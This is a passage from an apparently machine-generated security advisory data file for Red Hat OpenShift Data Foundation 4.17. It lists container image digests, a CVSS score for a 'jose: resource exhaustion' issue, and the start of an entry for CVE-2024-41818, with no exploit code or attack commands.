"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "jose: resource exhaustion", }, { cve: "CVE-2024-41818", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-07-29T16:24:42+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", 